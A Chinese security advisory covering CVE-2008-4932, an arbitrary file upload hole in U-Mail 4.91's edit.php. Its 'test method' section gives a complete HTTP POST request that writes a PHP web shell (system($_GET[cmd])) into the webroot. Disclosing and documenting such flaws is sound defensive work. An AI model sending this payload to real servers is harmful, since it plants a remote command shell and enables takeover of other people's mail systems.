安全研究

安全漏洞
U-Mail edit.php任意文件上传漏洞

发布日期:2008-10-31
更新日期:2008-11-06

受影响系统:
ComingChina.com U-Mail 4.91
描述:
BUGTRAQ  ID: 32013
CVE(CAN) ID: CVE-2008-4932

U-Mail专家级邮件系统是福洽科技最新推出的第四代企业邮局系统。

U-Mail邮件系统的edit.php文件没有正确地处理HTTP POST参数,远程攻击者可以通过提交恶意请求向webroot下的任意文件写入数据。如果向带有.php扩展的文件写入了PHP代码的话,就可能导致执行任意代码。

<*来源:Shennan Wang (wsn1983@gmail.com
  
  链接:http://secunia.com/advisories/32540/
        http://milw0rm.com/exploits/6898
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

POST /webmail/modules/filesystem/edit.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel,

application/vnd.ms-powerpoint, application/msword, application/x-silverlight, application/xaml+xml, application/vnd.ms-

xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
Referer: http://mail.d4rkn3t.cn/webmail/modules/filesystem/edit.php
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Host: mail.d4rkn3t.cn
Content-Length: 120
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: GO_AUTH_SOURCE_KEY=0; LANGUAGE_CK=zh_CN; SCREEN_CK=Default+Style; PHPSESSID=0fa330ffdfd62d9e1bd8bd3942974a18

path=/var/www/htdocs/webmail/cmd.php&task=save&name=cmd.php&content=<?system($_GET[cmd]);?>

建议:
厂商补丁:

ComingChina.com
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.comingchina.com/index.html

浏览次数:4094
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障